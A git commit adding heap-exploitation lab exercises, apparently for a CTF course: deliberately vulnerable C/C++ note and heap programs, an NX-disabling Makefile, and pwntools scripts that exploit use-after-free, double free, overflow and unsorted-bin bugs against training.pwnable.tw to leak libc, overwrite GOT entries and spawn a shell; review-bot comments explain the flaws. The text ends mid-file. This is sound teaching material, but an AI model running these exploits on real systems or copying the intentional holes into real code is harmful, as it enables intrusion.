add all lab

angelboy 2016-11-30 22:51:16 +08:00
parent 6e66417d3d
commit 340a58c46c
37 changed files with 1499 additions and 0 deletions

2
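--- a/LAB/lab10/Makefile
+++ b/LAB/lab10/Makefile
@@ -0,0 +1,2 @@
+hacknote:hacknote.c
+gcc -m32 hacknote.c -o hacknote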
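Review bot: The prebuilt `hacknote` executable is committed next to this rule, and nothing ties that binary to hacknote.c or to the flags used here. A checked-in binary cannot be reviewed in a diff, so either build it from source during setup or record its checksum and the compiler version beside it. The rule also compiles with no warnings enabled; `gcc -m32 -Wall -Wextra -Wformat-security hacknote.c -o hacknote` would report issues such as the non-literal format strings in lab7 to lab9 at build time. The same applies to the Makefiles and committed binaries of lab7, lab8, lab9 and lab11 to lab15.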

BIN
LAB/lab10/hacknote Executable file

Binary file not shown.

125
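--- a/LAB/lab10/hacknote.c
+++ b/LAB/lab10/hacknote.c
@@ -0,0 +1,125 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+struct note {
+void (*printnote)();
+char *content ;
+};
+struct note *notelist[5];
+int count = 0;
+void print_note_content(struct note *this){
+puts(this->content);
+}
+void add_note(){
+int i ;
+char buf[8];
+int size ;
+if(count > 5){
+puts("Full");
+return ;
+}
+for(i = 0 ; i < 5 ; i ++){
+if(!notelist[i]){
+notelist[i] = (struct note*)malloc(sizeof(struct note));
+if(!notelist[i]){
+puts("Alloca Error");
+exit(-1);
+}
+notelist[i]->printnote = print_note_content;
+printf("Note size :");
+read(0,buf,8);
+size = atoi(buf);
+notelist[i]->content = (char *)malloc(size);
+if(!notelist[i]->content){
+puts("Alloca Error");
+exit(-1);
+}
+printf("Content :");
+read(0,notelist[i]->content,size);
+puts("Success !");
+count++;
+break;
+}
+}
+}
+void del_note(){
+char buf[4];
+int idx ;
+printf("Index :");
+read(0,buf,4);
+idx = atoi(buf);
+if(idx < 0 || idx >= count){
+puts("Out of bound!");
+_exit(0);
+}
+if(notelist[idx]){
+free(notelist[idx]->content);
+free(notelist[idx]);
+puts("Success");
+}
+}
+void print_note(){
+char buf[4];
+int idx ;
+printf("Index :");
+read(0,buf,4);
+idx = atoi(buf);
+if(idx < 0 || idx >= count){
+puts("Out of bound!");
+_exit(0);
+}
+if(notelist[idx]){
+notelist[idx]->printnote(notelist[idx]);
+}
+}
+void magic(){
+system("cat /home/hacknote/flag");
+}
+void menu(){
+puts("----------------------");
+puts(" HackNote ");
+puts("----------------------");
+puts(" 1. Add note ");
+puts(" 2. Delete note ");
+puts(" 3. Print note ");
+puts(" 4. Exit ");
+puts("----------------------");
+printf("Your choice :");
+};
+int main(){
+setvbuf(stdout,0,2,0);
+setvbuf(stdin,0,2,0);
+char buf[4];
+while(1){
+menu();
+read(0,buf,4);
+switch(atoi(buf)){
+case 1 :
+add_note();
+break ;
+case 2 :
+del_note();
+break ;
+case 3 :
+print_note();
+break ;
+case 4 :
+exit(0);
+break ;
+default :
+puts("Invalid choice");
+break ;
+}
+}
+return 0;
+}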
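Review bot: del_note frees `notelist[idx]->content` and `notelist[idx]` but leaves the pointer in `notelist`, so a later print_note calls `printnote` through freed memory and a second delete of the same index frees both chunks again. If the dangling pointer is the flaw this lab is meant to teach, say so in a comment above del_note; otherwise add `notelist[idx] = NULL;` after the two frees. add_note's guard `if(count > 5)` is off by one for a five-slot array and should be `>= 5`. Every `read(0,buf,N)` that feeds `atoi(buf)` leaves `buf` unterminated when N bytes arrive, and `size` is passed to `malloc` without a range check; the unterminated-buffer pattern recurs in bamboobox.c, heapcreator.c and magicheap.c.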

40
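--- a/LAB/lab10/hacknote.py
+++ b/LAB/lab10/hacknote.py
@@ -0,0 +1,40 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwnpwnpwn import *
+from pwn import *
+host = "training.pwnable.tw"
+port = 11010
+r = remote(host,port)
+def addnote(size,content):
+r.recvuntil(":")
+r.sendline("1")
+r.recvuntil(":")
+r.sendline(str(size))
+r.recvuntil(":")
+r.sendline(content)
+def delnote(idx):
+r.recvuntil(":")
+r.sendline("2")
+r.recvuntil(":")
+r.sendline(str(idx))
+def printnote(idx):
+r.recvuntil(":")
+r.sendline("3")
+r.recvuntil(":")
+r.sendline(str(idx))
+magic = 0x08048986
+system = 0x8048506
+addnote(32,"ddaa")
+addnote(32,"ddaa")
+addnote(32,"ddaa")
+delnote(0)
+delnote(1)
+addnote(8,p32(magic))
+printnote(0)
+r.interactive()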
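Review bot: Nothing in this script says which flaw in hacknote.c it exercises or that it is meant only for the course's own lab service, and `r = remote(host,port)` connects as soon as the file is run. A header comment such as `# Lab 10 solution: exercises the dangling notelist pointer left by del_note; run only against the lab instance` would make that explicit for readers studying the fix. The assignment `system = 0x8048506` is never used and can be dropped. The other solution scripts in this commit (lab7, lab8 and lab11 to lab15) lack the same header.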

2
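--- a/LAB/lab11/Makefile
+++ b/LAB/lab11/Makefile
@@ -0,0 +1,2 @@
+bamboobox:bamboobox.c
+gcc bamboobox.c -o bamboobox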

BIN
LAB/lab11/bamboobox Executable file

Binary file not shown.

195
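--- a/LAB/lab11/bamboobox.c
+++ b/LAB/lab11/bamboobox.c
@@ -0,0 +1,195 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+struct item{
+int size ;
+char *name ;
+};
+struct item itemlist[100] = {0};
+int num ;
+void hello_message(){
+puts("There is a box with magic");
+puts("what do you want to do in the box");
+}
+void goodbye_message(){
+puts("See you next time");
+puts("Thanks you");
+}
+struct box{
+void (*hello_message)();
+void (*goodbye_message)();
+};
+void menu(){
+puts("----------------------------");
+puts("Bamboobox Menu");
+puts("----------------------------");
+puts("1.show the items in the box");
+puts("2.add a new item");
+puts("3.change the item in the box");
+puts("4.remove the item in the box");
+puts("5.exit");
+puts("----------------------------");
+printf("Your choice:");
+}
+void show_item(){
+int i ;
+if(!num){
+puts("No item in the box");
+}else{
+for(i = 0 ; i < 100; i++){
+if(itemlist[i].name){
+printf("%d : %s",i,itemlist[i].name);
+}
+}
+puts("");
+}
+}
+int add_item(){
+char sizebuf[8] ;
+int length ;
+int i ;
+int size ;
+if(num < 100){
+printf("Please enter the length of item name:");
+read(0,sizebuf,8);
+length = atoi(sizebuf);
+if(length == 0){
+puts("invaild length");
+return 0;
+}
+for(i = 0 ; i < 100 ; i++){
+if(!itemlist[i].name){
+itemlist[i].size = length ;
+itemlist[i].name = (char*)malloc(length);
+printf("Please enter the name of item:");
+size = read(0,itemlist[i].name,length);
+itemlist[i].name[size] = '\x00';
+num++;
+break;
+}
+}
+}else{
+puts("the box is full");
+}
+return 0;
+}
+void change_item(){
+char indexbuf[8] ;
+char lengthbuf[8];
+int length ;
+int index ;
+int readsize ;
+if(!num){
+puts("No item in the box");
+}else{
+printf("Please enter the index of item:");
+read(0,indexbuf,8);
+index = atoi(indexbuf);
+if(itemlist[index].name){
+printf("Please enter the length of item name:");
+read(0,lengthbuf,8);
+length = atoi(lengthbuf);
+printf("Please enter the new name of the item:");
+readsize = read(0,itemlist[index].name,length);
+*(itemlist[index].name + readsize) = '\x00';
+}else{
+puts("invaild index");
+}
+}
+}
+void remove_item(){
+char indexbuf[8] ;
+int index ;
+if(!num){
+puts("No item in the box");
+}else{
+printf("Please enter the index of item:");
+read(0,indexbuf,8);
+index = atoi(indexbuf);
+if(itemlist[index].name){
+free(itemlist[index].name);
+itemlist[index].name = 0 ;
+itemlist[index].size = 0 ;
+puts("remove successful!!");
+num-- ;
+}else{
+puts("invaild index");
+}
+}
+}
+void magic(){
+int fd ;
+char buffer[100];
+fd = open("/home/bamboobox/flag",O_RDONLY);
+read(fd,buffer,sizeof(buffer));
+close(fd);
+printf("%s",buffer);
+exit(0);
+}
+int main(){
+char choicebuf[8];
+int choice;
+struct box *bamboo ;
+setvbuf(stdout,0,2,0);
+setvbuf(stdin,0,2,0);
+bamboo = malloc(sizeof(struct box));
+bamboo->hello_message = hello_message;
+bamboo->goodbye_message = goodbye_message ;
+bamboo->hello_message();
+while(1){
+menu();
+read(0,choicebuf,8);
+choice = atoi(choicebuf);
+switch(choice){
+case 1:
+show_item();
+break;
+case 2:
+add_item();
+break;
+case 3:
+change_item();
+break;
+case 4:
+remove_item();
+break;
+case 5:
+bamboo->goodbye_message();
+exit(0);
+break;
+default:
+puts("invaild choice!!!");
+break;
+}
+}
+return 0 ;
+}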
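Review bot: change_item reads a caller-chosen `length` into `itemlist[index].name` without comparing it to the stored `itemlist[index].size`, so an edit can write past the allocation made in add_item. `index` from `atoi(indexbuf)` is also used unchecked in change_item and remove_item, so a negative or too-large value indexes outside `itemlist`. A guard such as `if (index < 0 || index >= 100 || length <= 0 || length >= itemlist[index].size)` before the read would bound both and leave room for the terminator. add_item has matching problems: `malloc(length)` is unchecked, a negative `length` is accepted, and `itemlist[i].name[size] = '\x00'` writes one byte past the buffer when `read` fills it, or before it when `read` returns -1. If these are the intended lab flaws, mark each with a comment so the unintended ones can be told apart.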

44
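--- a/LAB/lab11/bamboobox1.py
+++ b/LAB/lab11/bamboobox1.py
@@ -0,0 +1,44 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwnpwnpwn import *
+from pwn import *
+host = "training.pwnable.tw"
+port = 11011
+r = remote(host,port)
+def additem(length,name):
+r.recvuntil(":")
+r.sendline("2")
+r.recvuntil(":")
+r.sendline(str(length))
+r.recvuntil(":")
+r.sendline(name)
+def modify(idx,length,name):
+r.recvuntil(":")
+r.sendline("3")
+r.recvuntil(":")
+r.sendline(str(idx))
+r.recvuntil(":")
+r.sendline(str(length))
+r.recvuntil(":")
+r.sendline(name)
+def remove(idx):
+r.recvuntil(":")
+r.sendline("4")
+r.recvuntil(":")
+r.sendline(str(idx))
+def show():
+r.recvuntil(":")
+r.sendline("1")
+magic = 0x400d49
+additem(0x60,"ddaa")
+modify(0,0x70,"a"*0x60 + p64(0) + p64(0xffffffffffffffff))
+additem(-160,"dada")
+additem(0x20,p64(magic)*2)
+r.interactive()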

64
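--- a/LAB/lab11/bamboobox2.py
+++ b/LAB/lab11/bamboobox2.py
@@ -0,0 +1,64 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwn import *
+host = "training.pwnable.tw"
+port = 11011
+r = remote(host,port)
+def additem(length,name):
+r.recvuntil(":")
+r.sendline("2")
+r.recvuntil(":")
+r.sendline(str(length))
+r.recvuntil(":")
+r.sendline(name)
+def modify(idx,length,name):
+r.recvuntil(":")
+r.sendline("3")
+r.recvuntil(":")
+r.sendline(str(idx))
+r.recvuntil(":")
+r.sendline(str(length))
+r.recvuntil(":")
+r.sendline(name)
+def remove(idx):
+r.recvuntil(":")
+r.sendline("4")
+r.recvuntil(":")
+r.sendline(str(idx))
+def show():
+r.recvuntil(":")
+r.sendline("1")
+additem(0x40,"a"*8)
+additem(0x80,"b"*8)
+additem(0x40,"c"*8)
+ptr = 0x6020c8
+fake_chunk = p64(0) #prev_size
+fake_chunk += p64(0x41) #size
+fake_chunk += p64(ptr-0x18) #fd
+fake_chunk += p64(ptr-0x10) #bk
+fake_chunk += "c"*0x20
+fake_chunk += p64(0x40)
+fake_chunk += p64(0x90)
+modify(0,0x80,fake_chunk)
+remove(1)
+payload = p64(0)*2
+payload += p64(0x40) + p64(0x602068)
+modify(0,0x80,payload)
+show()
+r.recvuntil("0 : ")
+atoi = u64(r.recvuntil(":")[:6].ljust(8,"\x00"))
+libc = atoi - 0x36e80
+print "libc:",hex(libc)
+system = libc + 0x45390
+modify(0,0x8,p64(system))
+r.recvuntil(":")
+r.sendline("sh")
+r.interactive()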

2
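--- a/LAB/lab12/Makefile
+++ b/LAB/lab12/Makefile
@@ -0,0 +1,2 @@
+secretgarden:secretgarden.c
+gcc secretgarden.c -o secretgarden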

47
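--- a/LAB/lab12/secret.py
+++ b/LAB/lab12/secret.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwnpwnpwn import *
+from pwn import *
+host = "training.pwnable.tw"
+port = 11012
+r = remote(host,port)
+def raiseflower(length,name,color):
+r.recvuntil(":")
+r.sendline("1")
+r.recvuntil(":")
+r.sendline(str(length))
+r.recvuntil(":")
+r.sendline(name)
+r.recvuntil(":")
+r.sendline(color)
+def visit():
+r.recvuntil(":")
+r.sendline("2")
+def remove(idx):
+r.recvuntil(":")
+r.sendline("3")
+r.recvuntil(":")
+r.sendline(str(idx))
+def clean():
+r.recvuntil(":")
+r.sendline("4")
+magic = 0x400c7b
+fake_chunk = 0x601ffa
+raiseflower(0x50,"da","red")
+raiseflower(0x50,"da","red")
+remove(0)
+remove(1)
+remove(0)
+raiseflower(0x50,p64(fake_chunk),"blue")
+raiseflower(0x50,"da","red")
+raiseflower(0x50,"da","red")
+raiseflower(0x50,"a"*6 + p64(0) + p64(magic)*2 ,"red")
+r.interactive()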

BIN
LAB/lab12/secretgarden Executable file

Binary file not shown.

171
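--- a/LAB/lab12/secretgarden.c
+++ b/LAB/lab12/secretgarden.c
@@ -0,0 +1,171 @@
+#include <stdio.h>
+#include <signal.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#define TIMEOUT 60
+struct flower{
+int vaild ;
+char *name ;
+char color[24] ;
+};
+struct flower* flowerlist[100] ;
+unsigned int flowercount = 0 ;
+void menu(){
+puts("");
+puts("☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ");
+puts("☆ Baby Secret Garden ☆ ");
+puts("☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ");
+puts("");
+puts(" 1 . Raise a flower " );
+puts(" 2 . Visit the garden ");
+puts(" 3 . Remove a flower from the garden");
+puts(" 4 . Clean the garden");
+puts(" 5 . Leave the garden");
+puts("");
+printf("Your choice : ");
+}
+int add(){
+struct flower *newflower = NULL ;
+char *buf = NULL ;
+unsigned size =0;
+unsigned index ;
+if(flowercount < 100){
+newflower = malloc(sizeof(struct flower));
+memset(newflower,0,sizeof(struct flower));
+printf("Length of the name :");
+if(scanf("%u",&size)== EOF) exit(-1);
+buf = (char*)malloc(size);
+if(!buf){
+puts("Alloca error !!");
+exit(-1);
+}
+printf("The name of flower :");
+read(0,buf,size);
+newflower->name = buf ;
+printf("The color of the flower :");
+scanf("%23s",newflower->color);
+newflower->vaild = 1 ;
+for(index = 0 ; index < 100 ; index++ ){
+if(!flowerlist[index]){
+flowerlist[index] = newflower ;
+break ;
+}
+}
+flowercount++ ;
+puts("Successful !");
+}else{
+puts("The garden is overflow");
+}
+}
+int del(){
+unsigned int index ;
+if(!flowercount){
+puts("No flower in the garden");
+}else{
+printf("Which flower do you want to remove from the garden:");
+scanf("%d",&index);
+if(index < 0 ||index >= 100 || !flowerlist[index]){
+puts("Invalid choice");
+return 0 ;
+}
+(flowerlist[index])->vaild = 0 ;
+free((flowerlist[index])->name);
+puts("Successful");
+}
+}
+void magic(){
+int fd ;
+char buffer[100];
+fd = open("/home/babysecretgarden/flag",O_RDONLY);
+read(fd,buffer,sizeof(buffer));
+close(fd);
+printf("%s",buffer);
+exit(0);
+}
+void clean(){
+unsigned index ;
+for(index = 0 ; index < 100 ; index++){
+if(flowerlist[index] && (flowerlist[index])->vaild == 0){
+free(flowerlist[index]);
+flowerlist[index] = NULL;
+flowercount--;
+}
+}
+puts("Done!");
+}
+int visit(){
+unsigned index ;
+if(!flowercount){
+puts("No flower in the garden !");
+}else{
+for(index = 0 ; index < 100 ; index++){
+if(flowerlist[index] && (flowerlist[index])->vaild){
+printf("Name of the flower[%u] :%s\n",index,(flowerlist[index])->name);
+printf("Color of the flower[%u] :%s\n",index,(flowerlist[index])->color);
+}
+}
+}
+}
+void handler(int signum){
+puts("timeout");
+exit(1);
+}
+void init(){
+int fd;
+fd = open("/dev/urandom",0);
+close(fd);
+setvbuf(stdout,0,2,0);
+signal(SIGALRM,handler);
+alarm(TIMEOUT);
+}
+int main(){
+init();
+int choice ;
+char buf[10];
+while(1){
+menu();
+read(0,buf,8);
+choice = atoi(buf);
+switch(choice){
+case 1:
+add();
+break ;
+case 2:
+visit();
+break ;
+case 3:
+del();
+break ;
+case 4:
+clean();
+break ;
+case 5:
+puts("See you next time.");
+exit(0);
+default :
+puts("Invalid choice");
+break ;
+}
+}
+}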
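Review bot: del() frees `flowerlist[index]->name` and clears `vaild` but keeps both the list entry and the `name` pointer, and its guard only tests `!flowerlist[index]`, so removing the same index twice frees the same buffer twice until clean() runs. Adding `|| !flowerlist[index]->vaild` to that guard and setting `name = NULL` after the free would stop the repeat; if the double free is the lab's subject, a comment on del() should say so. In the same function `index` is unsigned, so `index < 0` is always false and `scanf("%d",&index)` should use `%u`. In add(), `newflower` is not checked before `memset`, and `read(0,buf,size)` leaves `name` unterminated for the `%s` in visit(). add(), del() and visit() are declared `int` but fall off the end without returning a value.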

2
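--- a/LAB/lab13/Makefile
+++ b/LAB/lab13/Makefile
@@ -0,0 +1,2 @@
+heapcreator:heapcreator.c
+gcc heapcreator.c -o heapcreator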

BIN
LAB/lab13/heapcreator Executable file

Binary file not shown.

152
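--- a/LAB/lab13/heapcreator.c
+++ b/LAB/lab13/heapcreator.c
@@ -0,0 +1,152 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+void read_input(char *buf,size_t size){
+int ret ;
+ret = read(0,buf,size);
+if(ret <=0){
+puts("Error");
+_exit(-1);
+}
+}
+struct heap {
+size_t size ;
+char *content ;
+};
+struct heap *heaparray[10];
+void menu(){
+puts("--------------------------------");
+puts(" Heap Creator ");
+puts("--------------------------------");
+puts(" 1. Create a Heap ");
+puts(" 2. Edit a Heap ");
+puts(" 3. Show a Heap ");
+puts(" 4. Delete a Heap ");
+puts(" 5. Exit ");
+puts("--------------------------------");
+printf("Your choice :");
+}
+void create_heap(){
+int i ;
+char buf[8];
+size_t size = 0;
+for(i = 0 ; i < 10 ; i++){
+if(!heaparray[i]){
+heaparray[i] = (struct heap *)malloc(sizeof(struct heap));
+if(!heaparray[i]){
+puts("Allocate Error");
+exit(1);
+}
+printf("Size of Heap : ");
+read(0,buf,8);
+size = atoi(buf);
+heaparray[i]->content = (char *)malloc(size);
+if(!heaparray[i]->content){
+puts("Allocate Error");
+exit(2);
+}
+heaparray[i]->size = size ;
+printf("Content of heap:");
+read_input(heaparray[i]->content,size);
+puts("SuccessFul");
+break ;
+}
+}
+}
+void edit_heap(){
+int idx ;
+char buf[4];
+printf("Index :");
+read(0,buf,4);
+idx = atoi(buf);
+if(idx < 0 || idx >= 10){
+puts("Out of bound!");
+_exit(0);
+}
+if(heaparray[idx]){
+printf("Content of heap : ");
+read_input(heaparray[idx]->content,heaparray[idx]->size+1);
+puts("Done !");
+}else{
+puts("No such heap !");
+}
+}
+void show_heap(){
+int idx ;
+char buf[4];
+printf("Index :");
+read(0,buf,4);
+idx = atoi(buf);
+if(idx < 0 || idx >= 10){
+puts("Out of bound!");
+_exit(0);
+}
+if(heaparray[idx]){
+printf("Size : %ld\nContent : %s\n",heaparray[idx]->size,heaparray[idx]->content);
+puts("Done !");
+}else{
+puts("No such heap !");
+}
+}
+void delete_heap(){
+int idx ;
+char buf[4];
+printf("Index :");
+read(0,buf,4);
+idx = atoi(buf);
+if(idx < 0 || idx >= 10){
+puts("Out of bound!");
+_exit(0);
+}
+if(heaparray[idx]){
+free(heaparray[idx]->content);
+free(heaparray[idx]);
+heaparray[idx] = NULL ;
+puts("Done !");
+}else{
+puts("No such heap !");
+}
+}
+int main(){
+char buf[4];
+setvbuf(stdout,0,2,0);
+setvbuf(stdin,0,2,0);
+while(1){
+menu();
+read(0,buf,4);
+switch(atoi(buf)){
+case 1 :
+create_heap();
+break ;
+case 2 :
+edit_heap();
+break ;
+case 3 :
+show_heap();
+break ;
+case 4 :
+delete_heap();
+break ;
+case 5 :
+exit(0);
+break ;
+default :
+puts("Invalid Choice");
+break;
+}
+}
+return 0 ;
+}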
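Review bot: edit_heap passes `heaparray[idx]->size+1` to read_input, one byte more than create_heap requested with `malloc(size)`, so a full-length edit writes one byte past the requested allocation. The call should be `read_input(heaparray[idx]->content, heaparray[idx]->size);`, or carry a comment if the off-by-one is the point of the lab. create_heap assigns `atoi(buf)` straight to a `size_t`, so a negative entry becomes a very large request, and `buf` is not terminated before `atoi`. show_heap prints `content` with `%s` although nothing terminates it, and `%ld` should be `%zu` for a `size_t`.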

58
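--- a/LAB/lab13/heapcreator.py
+++ b/LAB/lab13/heapcreator.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwnpwnpwn import *
+from pwn import *
+host = "training.pwnable.tw"
+port = 11013
+#host = "10.211.55.28"
+#port = 8888
+r = remote(host,port)
+def create(size,content):
+r.recvuntil(":")
+r.sendline("1")
+r.recvuntil(":")
+r.sendline(str(size))
+r.recvuntil(":")
+r.sendline(content)
+def edit(idx,content):
+r.recvuntil(":")
+r.sendline("2")
+r.recvuntil(":")
+r.sendline(str(idx))
+r.recvuntil(":")
+r.sendline(content)
+def show(idx):
+r.recvuntil(":")
+r.sendline("3")
+r.recvuntil(":")
+r.sendline(str(idx))
+def delete(idx):
+r.recvuntil(":")
+r.sendline("4")
+r.recvuntil(":")
+r.sendline(str(idx))
+free_got = 0x602018
+create(0x18,"dada") # 0
+create(0x10,"ddaa") # 1
+edit(0, "/bin/sh\x00" +"a"*0x10 + "\x41")
+delete(1)
+create(0x30,p64(0)*4 +p64(0x30) + p64(free_got)) #1
+show(1)
+r.recvuntil("Content : ")
+data = r.recvuntil("Done !")
+free_addr = u64(data.split("\n")[0].ljust(8,"\x00"))
+libc = free_addr - 0x83940
+print "libc:",hex(libc)
+system = libc + 0x45390
+edit(1,p64(system))
+delete(0)
+r.interactive()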

2
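--- a/LAB/lab14/Makefile
+++ b/LAB/lab14/Makefile
@@ -0,0 +1,2 @@
+magicheap:magicheap.c
+gcc magicheap.c -o magicheap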

BIN
LAB/lab14/magicheap Executable file

Binary file not shown.

134
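--- a/LAB/lab14/magicheap.c
+++ b/LAB/lab14/magicheap.c
@@ -0,0 +1,134 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+void read_input(char *buf,size_t size){
+int ret ;
+ret = read(0,buf,size);
+if(ret <=0){
+puts("Error");
+_exit(-1);
+}
+}
+char *heaparray[10];
+unsigned long int magic = 0 ;
+void menu(){
+puts("--------------------------------");
+puts(" Magic Heap Creator ");
+puts("--------------------------------");
+puts(" 1. Create a Heap ");
+puts(" 2. Edit a Heap ");
+puts(" 3. Delete a Heap ");
+puts(" 4. Exit ");
+puts("--------------------------------");
+printf("Your choice :");
+}
+void create_heap(){
+int i ;
+char buf[8];
+size_t size = 0;
+for(i = 0 ; i < 10 ; i++){
+if(!heaparray[i]){
+printf("Size of Heap : ");
+read(0,buf,8);
+size = atoi(buf);
+heaparray[i] = (char *)malloc(size);
+if(!heaparray[i]){
+puts("Allocate Error");
+exit(2);
+}
+printf("Content of heap:");
+read_input(heaparray[i],size);
+puts("SuccessFul");
+break ;
+}
+}
+}
+void edit_heap(){
+int idx ;
+char buf[4];
+size_t size ;
+printf("Index :");
+read(0,buf,4);
+idx = atoi(buf);
+if(idx < 0 || idx >= 10){
+puts("Out of bound!");
+_exit(0);
+}
+if(heaparray[idx]){
+printf("Size of Heap : ");
+read(0,buf,8);
+size = atoi(buf);
+printf("Content of heap : ");
+read_input(heaparray[idx] ,size);
+puts("Done !");
+}else{
+puts("No such heap !");
+}
+}
+void delete_heap(){
+int idx ;
+char buf[4];
+printf("Index :");
+read(0,buf,4);
+idx = atoi(buf);
+if(idx < 0 || idx >= 10){
+puts("Out of bound!");
+_exit(0);
+}
+if(heaparray[idx]){
+free(heaparray[idx]);
+heaparray[idx] = NULL ;
+puts("Done !");
+}else{
+puts("No such heap !");
+}
+}
+void l33t(){
+system("cat /home/magicheap/flag");
+}
+int main(){
+char buf[8];
+setvbuf(stdout,0,2,0);
+setvbuf(stdin,0,2,0);
+while(1){
+menu();
+read(0,buf,8);
+switch(atoi(buf)){
+case 1 :
+create_heap();
+break ;
+case 2 :
+edit_heap();
+break ;
+case 3 :
+delete_heap();
+break ;
+case 4 :
+exit(0);
+break ;
+case 4869 :
+if(magic > 4869){
+puts("Congrt !");
+l33t();
+}else
+puts("So sad !");
+break ;
+default :
+puts("Invalid Choice");
+break;
+}
+}
+return 0 ;
+}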
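Review bot: edit_heap declares `char buf[4]` and then calls `read(0,buf,8)` for the size prompt, writing up to four bytes past the stack buffer; this looks unintended, and `char buf[8]` as in create_heap would fix it. The function then reads a caller-chosen `size` into `heaparray[idx]`, whose allocated size was never recorded, so an edit can run past the chunk. Keeping the size beside the pointer, as heapcreator.c in this commit does with `struct heap`, and rejecting a larger `size` would bound the write; if the overflow is the lab's purpose, note that in a comment on edit_heap. `l33t()` shells out with `system("cat ...")` where opening and printing the file directly would avoid spawning a shell.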

51
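--- a/LAB/lab14/magicheap.py
+++ b/LAB/lab14/magicheap.py
@@ -0,0 +1,51 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwn import *
+host = "training.pwnable.tw"
+port = 11014
+r = remote(host,port)
+def create_heap(size,content):
+r.recvuntil(":")
+r.sendline("1")
+r.recvuntil(":")
+r.sendline(str(size))
+r.recvuntil(":")
+r.sendline(content)
+def edit_heap(idx,size,content):
+r.recvuntil(":")
+r.sendline("2")
+r.recvuntil(":")
+r.sendline(str(idx))
+r.recvuntil(":")
+r.sendline(str(size))
+r.recvuntil(":")
+r.sendline(content)
+def del_heap(idx):
+r.recvuntil(":")
+r.sendline("3")
+r.recvuntil(":")
+r.sendline(str(idx))
+create_heap(0x80,"dada") # 0
+create_heap(0x20,"dada") # 1
+create_heap(0x80,"dada") # 2
+create_heap(0x20,"dada") # 3
+del_heap(2)
+del_heap(0)
+magic = 0x6020c0
+fd = 0
+bk = magic - 0x10
+edit_heap(1,0x20+0x20,"a"*0x20 + p64(0) + p64(0x91) + p64(fd) + p64(bk))
+create_heap(0x80,"dada") #trigger unsorted bin attack
+r.recvuntil(":")
+r.sendline("4869")
+r.interactive()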

2
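--- a/LAB/lab15/Makefile
+++ b/LAB/lab15/Makefile
@@ -0,0 +1,2 @@
+zoo:zoo.cpp
+g++ -z execstack zoo.cpp -o zoo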
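Review bot: `-z execstack` asks the linker to mark the stack executable, which removes the non-executable-memory protection for this binary, and the rule gives no reason for it. Nothing visible in zoo.cpp requires an executable stack, so a comment should state that the setting is deliberate for the exercise, for example `# lab15: NX intentionally disabled for this exercise`. Without it the flag reads as a leftover and is easy to copy into other targets.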

BIN
LAB/lab15/zoo Executable file

Binary file not shown.

185
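--- a/LAB/lab15/zoo.cpp
+++ b/LAB/lab15/zoo.cpp
@@ -0,0 +1,185 @@
+#include <stdio.h>
+#include <iostream>
+#include <unistd.h>
+#include <vector>
+#include <string.h>
+using namespace std;
+char nameofzoo[100];
+class Animal {
+public :
+Animal(){
+memset(name,0,24);
+weight = 0;
+}
+virtual void speak(){;}
+virtual void info(){;}
+protected :
+char name[24];
+int weight;
+};
+class Dog : public Animal{
+public :
+Dog(string str,int w){
+strcpy(name,str.c_str());
+weight = w ;
+}
+virtual void speak(){
+cout << "Wow ~ Wow ~ Wow ~" << endl ;
+}
+virtual void info(){
+cout << "|---------------------|" << endl ;
+cout << "| Animal info |" << endl;
+cout << "|---------------------|" << endl;
+cout << " Weight :" << this->weight << endl ;
+cout << " Name : " << this->name << endl ;
+cout << "|---------------------|" << endl;
+}
+};
+class Cat : public Animal{
+public :
+Cat(string str,int w){
+strcpy(name,str.c_str());
+weight = w ;
+}
+virtual void speak(){
+cout << "Meow ~ Meow ~ Meow ~" << endl ;
+}
+virtual void info(){
+cout << "|---------------------|" << endl ;
+cout << "| Animal info |" << endl;
+cout << "|---------------------|" << endl;
+cout << " Weight :" << this->weight << endl ;
+cout << " Name : " << this->name << endl ;
+cout << "|---------------------|" << endl;
+}
+};
+vector<Animal *> animallist ;
+void menu(){
+cout << "*********************************" << endl ;
+cout << " 1. Add a dog " << endl ;
+cout << " 2. Add a cat " << endl ;
+cout << " 3. Listen a animal " << endl ;
+cout << " 4. Show a animal info " << endl ;
+cout << " 5. Remove a animal " << endl ;
+cout << " 6. Exit " << endl ;
+cout << "*********************************" << endl ;
+}
+void adddog(){
+string name ;
+int weight ;
+cout << "Name : " ;
+cin >> name;
+cout << "Weight : " ;
+cin >> weight ;
+Dog *mydog = new Dog(name,weight);
+animallist.push_back(mydog);
+}
+void addcat(){
+string name ;
+int weight ;
+cout << "Name : " ;
+cin >> name;
+cout << "Weight : " ;
+cin >> weight ;
+Cat *mycat = new Cat(name,weight);
+animallist.push_back(mycat);
+}
+void remove(){
+unsigned int idx ;
+if(animallist.size() == 0){
+cout << "no any animal!" << endl ;
+return ;
+}
+cout << "index of animal : ";
+cin >> idx ;
+if(idx >= animallist.size()){
+cout << "out of bound !" << endl;
+return ;
+}
+delete animallist[idx];
+animallist.erase(animallist.begin()+idx);
+}
+void showinfo(){
+unsigned int idx ;
+if(animallist.size() == 0){
+cout << "no any animal!" << endl ;
+return ;
+}
+cout << "index of animal : ";
+cin >> idx ;
+if(idx >= animallist.size()){
+cout << "out of bound !" << endl;
+return ;
+}
+animallist[idx]->info();
+}
+void listen(){
+unsigned int idx ;
+if(animallist.size() == 0){
+cout << "no any animal!" << endl ;
+return ;
+}
+cout << "index of animal : ";
+cin >> idx ;
+if(idx >= animallist.size()){
+cout << "out of bound !" << endl;
+return ;
+}
+animallist[idx]->speak();
+}
+int main(void){
+unsigned int choice ;
+setvbuf(stdout,0,2,0);
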